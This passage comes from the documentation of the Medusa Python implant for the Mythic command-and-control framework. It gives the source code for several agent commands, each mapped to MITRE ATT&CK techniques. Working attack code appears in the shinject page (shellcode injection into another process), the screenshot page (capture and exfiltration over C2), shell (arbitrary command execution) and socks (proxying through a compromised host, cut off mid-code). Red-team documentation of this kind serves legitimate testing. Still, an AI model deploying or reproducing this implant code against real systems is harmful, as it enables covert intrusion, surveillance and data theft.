    "content": "+++\ntitle = \"mv\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nMove a given file or folder to a specified location. No quotes are necessary and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n### Arguments\n\n#### source_path\n\n- Description: path of file/folder to move\n- Required Value: True  \n- Default Value: None  \n\n#### dest_path\n\n- Description: path to move file/folder to  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n### Without Popup Option\n```\nmv path/of/file_or_folder /dest/to/move/to \n```\n\n## Detailed Summary\nYou can either type `mv` and get a popup to fill in the paths, or provide the paths on the command line. \n\n```Python\n    def mv(self, task_id, source, destination):\n        import shutil\n        source_path = source if source[0] == os.sep \\\n                else os.path.join(self.current_directory,source)\n        dest_path = destination if destination[0] == os.sep \\\n                else os.path.join(self.current_directory,destination)\n        shutil.move(source_path, dest_path)\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/pip_freeze.md",
    "content": "+++\ntitle = \"pip_freeze\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nPrints the currently installed python packages on the target system\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\npip_freeze\n```\n\n## Detailed Summary\n\nAttempts to list packages (ideally with version information) using a series of methods, based on availability:\n\n```Python\n    def pip_freeze(self, task_id):\n        out=\"\"\n        try:\n            import pkg_resources\n            installed_packages = pkg_resources.working_set\n            installed_packages_list = sorted([\"%s==%s\" % (i.key, i.version) for i in installed_packages])\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pkg_resources module not installed.\\n\"\n\n        try:\n            from pip._internal.operations.freeze import freeze\n            installed_packages_list = freeze(local_only=True)\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pip module not installed.\\n\"\n\n        try:\n            import pkgutil\n            installed_packages_list = [ a for _, a, _ in pkgutil.iter_modules()]\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pkgutil module not installed.\\n\"\n\n        return out+\"[!] No modules available to list installed packages.\" \n```\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/ps.md",
    "content": "+++\ntitle = \"ps\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the ctypes library to interface with Windows API to enumerate process IDs and return a limited (marginally better opsec) process list.\n\n- Python Versions Supported: 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nps\n```\n\n## MITRE ATT&CK Mapping\n\n- T1057  \n\n## Detailed Summary\nThis function will only return PID, process name, architecture and binary path. Further details can be pulled back with `ps_full`.\n\n```Python\n    def ps(self, task_id):\n        import sys, os.path, ctypes, ctypes.wintypes, re\n        from ctypes import create_unicode_buffer, GetLastError\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Psapi = ctypes.WinDLL('Psapi.dll')\n        EnumProcesses = Psapi.EnumProcesses\n        EnumProcesses.restype = ctypes.wintypes.BOOL\n        GetProcessImageFileName = Psapi.GetProcessImageFileNameA\n        GetProcessImageFileName.restype = ctypes.wintypes.DWORD\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        IsWow64Process = Kernel32.IsWow64Process\n\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7\n\n        MAX_PATH = 260\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        TOKEN_QUERY = 0x0008\n        TOKEN_READ = 
0x00020008\n        TOKEN_IMPERSONATE = 0x00000004\n        TOKEN_QUERY_SOURCE = 0x0010\n        TOKEN_DUPLICATE = 0x0002\n        TOKEN_ASSIGN_PRIMARY = 0x0001 \n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n        STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       = NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n        def query_dos_device(drive_letter):\n            chars = 1024\n            drive_letter = drive_letter\n            p = create_unicode_buffer(chars)\n            if 0 == Kernel32.QueryDosDeviceW(drive_letter, p, chars):\n                pass\n            return p.value\n\n        def create_drive_mapping():\n            mappings = {}\n            for letter in (chr(l) for l in range(ord('C'), ord('Z')+1)):\n                try:\n                    letter = u'%s:' % letter\n                    mapped = query_dos_device(letter)\n                    mappings[mapped] = letter\n                except WindowsError: pass\n            return mappings\n\n        mappings = create_drive_mapping()\n\n        def normalise_binpath(path):\n            match = re.match(r'(^\\\\Device\\\\[a-zA-Z0-9]+)(\\\\.*)?$', path)\n            if not match:\n                return f\"Cannot convert {path} into a Win32 compatible path\"\n            if not match.group(1) in mappings:\n                return None\n            drive = mappings[match.group(1)]\n            if not drive or not match.group(2):\n                return drive\n            return drive + match.group(2)\n\n        processes = []\n\n        count = 32\n        while True:\n            ProcessIds = (ctypes.wintypes.DWORD*count)()\n            cb = ctypes.sizeof(ProcessIds)\n            BytesReturned 
= ctypes.wintypes.DWORD()\n            if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)):\n                if BytesReturned.value<cb:\n                    break\n                else:\n                    count *= 2\n            else:\n                sys.exit(\"Call to EnumProcesses failed\")\n\n        for index in range(int(BytesReturned.value / ctypes.sizeof(ctypes.wintypes.DWORD))):\n            process = {}\n            process[\"process_id\"] = ProcessId = ProcessIds[index]\n            if ProcessId == 0: continue\n\n            hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId)\n            if hProcess:\n                ImageFileName = (ctypes.c_char*MAX_PATH)()\n                Is64Bit = ctypes.c_int32()\n                IsWow64Process(hProcess, ctypes.byref(Is64Bit))\n                arch = \"x86\" if Is64Bit.value else \"x64\"\n                process[\"architecture\"] = arch\n\n\n                if GetProcessImageFileName(hProcess, ImageFileName, MAX_PATH)>0:\n                    filename = os.path.basename(ImageFileName.value)\n                    process[\"name\"] = filename.decode()\n                    process[\"bin_path\"] = normalise_binpath(ImageFileName.value.decode())\n                    \n                CloseHandle(hProcess)\n            processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return { \"processes\": processes }\n\n```\n\nThis output is turned into a sortable table via a browserscript."
  },
  {
    "path": "documentation-payload/medusa/commands/ps_full.md",
    "content": "+++\ntitle = \"ps_full\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis uses the ctypes library to interface with Windows API to enumerate process IDs and return a full process list.\n\n- Python Versions Supported: 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n## Usage\n\n```\nps_full\n```\n\n## MITRE ATT&CK Mapping\n\n- T1057  \n\n## Detailed Summary\nIn addition to what is returned with `ps`, this function returns the PPID, integrity level and command line parameters.\n\n```Python\n    def ps_full(self, task_id):\n        import sys, os.path, ctypes, ctypes.wintypes\n        from ctypes import create_unicode_buffer, GetLastError\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Psapi = ctypes.WinDLL('Psapi.dll')\n        EnumProcesses = Psapi.EnumProcesses\n        EnumProcesses.restype = ctypes.wintypes.BOOL\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        IsWow64Process = Kernel32.IsWow64Process\n\n        GetCurrentProcess = Kernel32.GetCurrentProcess\n        GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n        GetCurrentProcess.argtypes = ()\n\n        ReadProcessMemory = Kernel32.ReadProcessMemory\n        ReadProcessMemory.errcheck = _check_bool\n        ReadProcessMemory.argtypes = (\n            ctypes.wintypes.HANDLE, \n            ctypes.wintypes.LPCVOID,\n            ctypes.wintypes.LPVOID, \n        
    SIZE_T,           \n            ctypes.POINTER(SIZE_T))\n\n        PROCESS_VM_READ           = 0x0010\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        MAX_PATH = 260\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n        STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       = NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n\n        class RemotePointer(ctypes._Pointer):\n            def __getitem__(self, key):\n                size = None\n                if not isinstance(key, tuple):\n                    raise KeyError('must be (index, handle[, size])')\n                if len(key) > 2:\n                    index, handle, size = key\n                else:\n                    index, handle = key\n                if isinstance(index, slice):\n                    raise TypeError('slicing is not supported')\n                dtype = self._type_\n                offset = ctypes.sizeof(dtype) * index\n                address = PVOID.from_buffer(self).value + offset\n                simple = issubclass(dtype, ctypes._SimpleCData)\n                if simple and size is not None:\n                    if dtype._type_ == ctypes.wintypes.WCHAR._type_:\n                        buf = (ctypes.wintypes.WCHAR * (size // 2))()\n                    else: buf = (ctypes.c_char * size)()\n                else: buf = dtype()\n                nread = SIZE_T()\n                Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), \\\n                        ctypes.sizeof(buf), ctypes.byref(nread))\n                if simple: return buf.value\n                return buf\n\n        _remote_pointer_cache = {}\n        def 
RPOINTER(dtype):\n            if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype]\n            name = 'RP_%s' % dtype.__name__\n            ptype = type(name, (RemotePointer,), {'_type_': dtype})\n            _remote_pointer_cache[dtype] = ptype\n            return ptype\n\n        RPWSTR = RPOINTER(ctypes.wintypes.WCHAR)\n\n        class UNICODE_STRING(ctypes.Structure):\n            _fields_ = (('Length',        ctypes.wintypes.USHORT),\n                        ('MaximumLength', ctypes.wintypes.USHORT),\n                        ('Buffer',        RPWSTR))\n\n        class LIST_ENTRY(ctypes.Structure):\n            pass\n\n        RPLIST_ENTRY = RPOINTER(LIST_ENTRY)\n\n        LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY),\n                            ('Blink', RPLIST_ENTRY))\n\n        class PEB_LDR_DATA(ctypes.Structure):\n            _fields_ = (('Reserved1',               ctypes.wintypes.BYTE * 8),\n                        ('Reserved2',               PVOID * 3),\n                        ('InMemoryOrderModuleList', LIST_ENTRY))\n\n        RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA)\n\n        class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure):\n            _fields_ = (('Reserved1',     ctypes.wintypes.BYTE * 16),\n                        ('Reserved2',     PVOID * 10),\n                        ('ImagePathName', UNICODE_STRING),\n                        ('CommandLine',   UNICODE_STRING))\n\n        RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS)\n        PPS_POST_PROCESS_INIT_ROUTINE = PVOID\n\n        class PEB(ctypes.Structure):\n            _fields_ = (('Reserved1',              ctypes.wintypes.BYTE * 2),\n                        ('BeingDebugged',          ctypes.wintypes.BYTE),\n                        ('Reserved2',              ctypes.wintypes.BYTE * 1),\n                        ('Reserved3',              PVOID * 2),\n                        ('Ldr',                    RPPEB_LDR_DATA),\n                        
('ProcessParameters',      RPRTL_USER_PROCESS_PARAMETERS),\n                        ('Reserved4',              ctypes.wintypes.BYTE * 104),\n                        ('Reserved5',              PVOID * 52),\n                        ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE),\n                        ('Reserved6',              ctypes.wintypes.BYTE * 128),\n                        ('Reserved7',              PVOID * 1),\n                        ('SessionId',              ctypes.wintypes.ULONG))\n\n        RPPEB = RPOINTER(PEB)\n\n        class PROCESS_BASIC_INFORMATION(ctypes.Structure):\n            _fields_ = (('Reserved1',       PVOID),\n                        ('PebBaseAddress',  RPPEB),\n                        ('Reserved2',       PVOID * 2),\n                        ('UniqueProcessId', ULONG_PTR),\n                        ('InheritedFromUniqueProcessId',       ULONG_PTR))\n\n        def NtError(status):\n            import sys\n            descr = 'NTSTATUS(%#08x) ' % (status % 2**32,)\n            if status & 0xC0000000 == 0xC0000000:\n                descr += '[Error]'\n            elif status & 0x80000000 == 0x80000000:\n                descr += '[Warning]'\n            elif status & 0x40000000 == 0x40000000:\n                descr += '[Information]'\n            else:\n                descr += '[Success]'\n            if sys.version_info[:2] < (3, 3):\n                return WindowsError(status, descr)\n            return OSError(None, descr, None, status)\n\n        ntdll = ctypes.WinDLL('ntdll.dll')\n        NtQueryInformationProcess = ntdll.NtQueryInformationProcess\n        NtQueryInformationProcess.restype = NTSTATUS\n        NtQueryInformationProcess.argtypes = (\n            ctypes.wintypes.HANDLE,\n            PROCESSINFOCLASS, \n            PVOID,            \n            ctypes.wintypes.ULONG,\n            PULONG)        \n\n        class ProcessInformation(object):\n            _close_handle = False\n            _closed = False\n      
      _module_names = None\n\n            def __init__(self, process_id=None, handle=None):\n                if process_id is None and handle is None:\n                    handle = GetCurrentProcess()\n                elif handle is None:\n                    handle = OpenProcess(PROCESS_VM_READ | \n                                            PROCESS_QUERY_INFORMATION,\n                                                False, process_id)\n                    self._close_handle = True\n                self._handle = handle\n                if not self._query_info() or (process_id is not None \\\n                    and self._process_id != process_id):\n                    return\n\n            def __del__(self, CloseHandle=CloseHandle):\n                if self._close_handle and not self._closed:\n                    try:\n                        CloseHandle(self._handle)\n                    except WindowsError as e: pass\n                    self._closed = True\n\n            def _query_info(self):\n                info = PROCESS_BASIC_INFORMATION()\n                handle = self._handle\n                status = NtQueryInformationProcess(handle, ProcessBasicInformation,\n                            ctypes.byref(info), ctypes.sizeof(info), None)\n                if status < 0:\n                    return False\n\n                self._process_id = info.UniqueProcessId\n                self._parent_process_id = info.InheritedFromUniqueProcessId\n                self._peb = peb = info.PebBaseAddress[0, handle]\n                self._params = peb.ProcessParameters[0, handle]\n\n                Is64Bit = ctypes.c_int32()\n                IsWow64Process(handle, ctypes.byref(Is64Bit))\n                self._arch = \"x86\" if Is64Bit.value else \"x64\"\n\n            @property\n            def process_id(self):\n                return self._process_id\n\n            @property\n            def session_id(self):\n                return self._peb.SessionId\n\n            
@property\n            def image_path(self):\n                ustr = self._params.ImagePathName\n                return ustr.Buffer[0, self._handle, ustr.Length]\n\n            @property\n            def command_line(self):\n                ustr = self._params.CommandLine\n                buf = ustr.Buffer[0, self._handle, ustr.Length]\n                return buf\n\n        processes = []\n\n        count = 32\n        while True:\n            ProcessIds = (ctypes.wintypes.DWORD*count)()\n            cb = ctypes.sizeof(ProcessIds)\n            BytesReturned = ctypes.wintypes.DWORD()\n            if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)):\n                if BytesReturned.value<cb:\n                    break\n                else:\n                    count *= 2\n            else:\n                sys.exit(\"Call to EnumProcesses failed\")\n\n        for index in range(int(BytesReturned.value / ctypes.sizeof(ctypes.wintypes.DWORD))):\n            process = {}\n            process[\"process_id\"] = ProcessId = ProcessIds[index]\n            if ProcessId == 0: continue\n\n            try:\n                pi = ProcessInformation(ProcessId)\n                process[\"name\"] = os.path.basename(pi.image_path)\n                process[\"architecture\"] = str(pi._arch)\n                process[\"bin_path\"] = pi.image_path\n                process[\"integrity_level\"] = pi.session_id\n                process[\"parent_process_id\"] = pi._parent_process_id\n                process[\"command_line\"] = pi.command_line\n            except:\n                pass\n            processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return { \"processes\": processes }\n\n```\n\nThis output is turned into a sortable table via a browserscript."
  },
  {
    "path": "documentation-payload/medusa/commands/rm.md",
    "content": "+++\ntitle = \"rm\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nRemove a file or directory, no quotes are necessary and relative paths are fine \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### path\n\n- Description: Path to file or folder to remove  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nrm ../path/to/file_or_folder\n```\n\n## MITRE ATT&CK Mapping\n\n- T1106  \n- T1107  \n\n## Detailed Summary\nUses Python `os` library functions to remove the file or folder specified:\n```Python\n    def rm(self, task_id, path):\n        import shutil\n        file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        if os.path.isdir(file_path):\n            shutil.rmtree(file_path)\n        else:\n            os.remove(file_path)\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/screenshot.md",
    "content": "+++\ntitle = \"screenshot\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nUse the built-in CGDisplay API calls to capture the display and send it back over the C2 channel. \n\n- Python Versions Supported: 2.7\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500\n\n## Usage\n\n```\nscreenshot\n```\n\n## MITRE ATT&CK Mapping\n\n- T1113  \n\n## Detailed Summary\n\nThis uses API calls to read the current screen the return it to Mythic. This doesn't currently capture _all_ screens though.\n\n```Python\n    def screenshot(self, task_id):\n        from Cocoa import NSURL, NSBitmapImageRep\n        import LaunchServices\n        import Quartz\n        import Quartz.CoreGraphics as CG\n        region = CG.CGRectInfinite\n        image = CG.CGWindowListCreateImage(region, CG.kCGWindowListOptionOnScreenOnly, CG.kCGNullWindowID, CG.kCGWindowImageDefault)\n        sh_data = CG.CFDataCreateMutable(None, 0)\n        dest = Quartz.CGImageDestinationCreateWithData(sh_data, LaunchServices.kUTTypePNG, 1, None)\n        file_size = 0\n        if(dest):\n            Quartz.CGImageDestinationAddImage (dest, image, 0)\n            if (Quartz.CGImageDestinationFinalize(dest)):\n                file_size = CG.CFDataGetLength(sh_data)\n\n        if(file_size) > 0:\n            total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n            data = {\n                \"action\": \"post_response\", \n                \"responses\": [\n                {\n                    \"task_id\": task_id,\n                    \"total_chunks\": total_chunks,\n                    \"file_path\": str(datetime.now()),\n                    \"chunk_size\": CHUNK_SIZE,\n                    \"is_screenshot\": True \n                }]\n            }\n            initial_response = self.postMessageAndRetrieveResponse(data)\n            for i in range(0,total_chunks):\n                if [task for task in self.taskings if task[\"task_id\"] == 
task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                if i == total_chunks:\n                    content = sh_data[i*CHUNK_SIZE:]\n                else:\n                    content = sh_data[i*CHUNK_SIZE:(i+1)*CHUNK_SIZE]\n                data = {\n                    \"action\": \"post_response\", \n                    \"responses\": [\n                        {\n                            \"chunk_num\": i+1,\n                            \"file_id\": initial_response[\"responses\"][0][\"file_id\"],\n                            \"chunk_data\": base64.b64encode(content),\n                            \"task_id\": task_id                        \n                        }\n                    ]\n                }\n                response = self.postMessageAndRetrieveResponse(data)\n\n```\n\nThe screencapture is chunked and sent back to Mythic.\n\n>**NOTE** With 10.15, there are protections against this, so be careful\n\n"
  },
  {
    "path": "documentation-payload/medusa/commands/shell.md",
    "content": "+++\ntitle = \"shell\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis runs {command} in a terminal by leveraging the `subprocess` Python library.\n     \n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### command\n\n- Description: Command to run  \n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nshell {command}\n```\n\n## MITRE ATT&CK Mapping\n\n- T1059  \n\n## Detailed Summary\n\nIn the event that stderr has content, this will be returned by the function, providing the operator with details of issues encountered.\n\n```Python\n    def shell(self, task_id, command):\n        import subprocess\n        process = subprocess.Popen(command.split(),\n                     stdout=subprocess.PIPE, \n                     stderr=subprocess.PIPE,\n                     cwd=self.current_directory)\n        stdout, stderr = process.communicate()\n        out = stderr if stderr else stdout\n        return out.decode()\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/shinject.md",
    "content": "+++\ntitle = \"shinject\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis takes shellcode and injects it into a target process by ID.\n     \n{{% notice warning %}}\nMake sure you match the architecture of your shellcode and target process.\n{{% /notice %}}\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### shellcode\n\n- Description: File upload of shellcode to inject\n- Required Value: True  \n- Default Value: None  \n\n#### process id\n\n- Description: ID of process to inject shellcode into\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nshinject\n```\n\n## MITRE ATT&CK Mapping\n\n- T1059  \n\n## Detailed Summary\n\nThis makes use of the `ctypes` library once more, to perform the OpenProcess -> VirtualAllocex -> WriteProcessMemory -> CreateRemoteThread injection technique.\n\n\n\n```Python\n    def shinject(self, task_id, shellcode, pid):\n        from ctypes import windll,c_int,byref,c_ulong\n        total_chunks = 1\n        chunk_num = 0\n        sc = b\"\"\n        while (chunk_num < total_chunks):\n            data = { \n                \"action\": \"post_response\", \"responses\": [{\n                    \"upload\": { \"chunk_size\": 51200, \"file_id\": shellcode, \"chunk_num\": chunk_num },\n                    \"task_id\": task_id\n                }] \n            }\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            sc+=base64.b64decode(chunk[\"chunk_data\"])\n\n        PAGE_EXECUTE_READWRITE = 0x00000040\n        PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )\n        VIRTUAL_MEM  = ( 0x1000 | 0x2000 )\n\n        kernel32 = windll.kernel32\n        code_size = len(sc)\n        h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))\n\n     
   if not h_process:\n            return \"Error: Couldn't acquire a handle to PID {}\".format(pid)\n        arg_address = kernel32.VirtualAllocEx(h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)\n        written = c_int(0)\n        kernel32.WriteProcessMemory(h_process, arg_address, sc, code_size, byref(written))\n        thread_id = c_ulong(0)\n        if not kernel32.CreateRemoteThread(h_process, None, 0, arg_address, None, 0, byref(thread_id)):\n            return \"[*] Failed to inject process-killing shellcode. Exiting.\"\n        return \"[*] Remote thread created.\"\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/sleep.md",
    "content": "+++\ntitle = \"sleep\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nModify the time between callbacks in seconds. \n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### jitter\n\n- Description: Percentage of C2's interval to use as jitter   \n- Required Value: False  \n- Default Value: None  \n\n#### seconds\n\n- Description: Number of seconds between checkins   \n- Required Value: False  \n- Default Value: None  \n\n## Usage\n### Without Popup\n\n```\nsleep [seconds] [jitter]\n```\n\n## MITRE ATT&CK Mapping\n\n- T1029  \n\n## Detailed Summary\n\nInternally modifies the sleep interval and sleep jitter percentages when doing callbacks:\n\n```Python\n    def sleep(self, task_id, seconds, jitter=-1):\n        self.agent_config[\"Sleep\"] = int(seconds)\n        if jitter != -1:\n            self.agent_config[\"Jitter\"] = int(jitter)\n\n```\n"
  },
  {
    "path": "documentation-payload/medusa/commands/socks.md",
    "content": "+++\ntitle = \"socks\"\nchapter = false\nweight = 100\nhidden = false\n+++\n\n## Summary\n\nThis establishes a SOCKS5 proxy through the Medusa agent, permitting tooling to be proxied through the compromised host.\n\n- Python Versions Supported: 2.7, 3.8\n- Needs Admin: False  \n- Version: 1  \n- Author: @ajpc500  \n\n### Arguments\n\n#### action\n\n- Description: start/stop the proxy\n- Required Value: True  \n- Default Value: None  \n\n#### port\n\n- Description: The port on the Mythic server to open for SOCKS traffic\n- Required Value: True  \n- Default Value: None  \n\n## Usage\n\n```\nsocks start/stop port_no\n```\n\n## MITRE ATT&CK Mapping\n\n- T1090  \n\n## Detailed Summary\n\nNote that this function has changeable sleep intervals and queue timeouts; you might want to tune these if you experience sluggish comms or high-cpu usage.\n\nPython 2.7:\n\n```Python\n    def socks(self, task_id, action, port):\n        import socket, select\n        from threading import Thread, activeCount\n        from struct import pack, unpack\n        from Queue import Queue \n        \n        MAX_THREADS = 200\n        BUFSIZE = 2048\n        TIMEOUT_SOCKET = 5\n        OUTGOING_INTERFACE = \"\"\n\n        VER = b'\\x05'\n        M_NOAUTH = b'\\x00'\n        M_NOTAVAILABLE = b'\\xff'\n        CMD_CONNECT = b'\\x01'\n        ATYP_IPV4 = b'\\x01'\n        ATYP_DOMAINNAME = b'\\x03'\n\n        SOCKS_SLEEP_INTERVAL = 0.1\n        QUEUE_TIMOUT = 1\n\n        def sendSocksPacket(server_id, data, exit_value):\n            self.socks_out.put({ \"server_id\": server_id, \n                \"data\": base64.b64encode(data), \"exit\": exit_value })\n            \n        def create_socket():\n            try:\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                sock.settimeout(TIMEOUT_SOCKET)\n            except: return \"Failed to create socket: {}\".format(str(err))\n            return sock\n\n        def connect_to_dst(dst_addr, 
dst_port):\n            sock = create_socket()\n            if OUTGOING_INTERFACE:\n                try:\n                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE)\n                except PermissionError as err: return 0\n            try:\n                sock.connect((str(dst_addr), int(dst_port)))\n                return sock\n            except socket.error as err: return 0\n\n        def request_client(msg):\n            try:\n                message = base64.b64decode(msg[\"data\"])\n                s5_request = bytearray(message[:BUFSIZE])\n            except:\n                return False\n            if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\\x00'):\n                return False\n            if s5_request[3:4] == ATYP_IPV4:\n                dst_addr = socket.inet_ntoa(s5_request[4:-2])\n                dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]\n            elif s5_request[3:4] == ATYP_DOMAINNAME:\n                sz_domain_name = s5_request[4]\n                dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]\n                port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]\n                dst_port = unpack('>H', port_to_unpack)[0]\n            else: return False\n            return (dst_addr, dst_port)\n\n        def create_connection(msg):\n            dst = request_client(msg)\n            rep = b'\\x07'\n            bnd = b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00'\n            if dst: \n                socket_dst = connect_to_dst(dst[0], dst[1])\n            if not dst or socket_dst == 0: rep = b'\\x01'\n            else:\n                rep = b'\\x00'\n                bnd = socket.inet_aton(socket_dst.getsockname()[0])\n                bnd += pack(\">H\", socket_dst.getsockname()[1])\n            reply = VER + rep + b'\\x00' + ATYP_IPV4 + bnd\n            try: sendSocksPacket(msg[\"server_id\"], reply, 
msg[\"exit\"])                \n            except: return\n            if rep == b'\\x00': return socket_dst\n\n        def get_running_socks_thread():\n            return [ t for t in threading.enumerate() if \"socks:\" in t.name and not task_id in t.name ]\n\n        def a2m(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys(): return\n                try: reader, _, _ = select.select([socket_dst], [], [], 1)\n                except select.error as err: return\n\n                if not reader: continue\n                try:\n                    for sock in reader:\n                        data = sock.recv(BUFSIZE)\n                        if not data:\n                            sendSocksPacket(server_id, b\"\", True)\n                            socket_dst.close()\n                            return\n                        sendSocksPacket(server_id, data, False)\n                except Exception as e: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        def m2a(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys():\n                    socket_dst.close()\n                    return\n                try:\n                    if not self.socks_open[server_id].empty():\n                        socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))\n                except: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        t_socks = get_running_socks_thread()\n\n        if action == \"start\":\n        
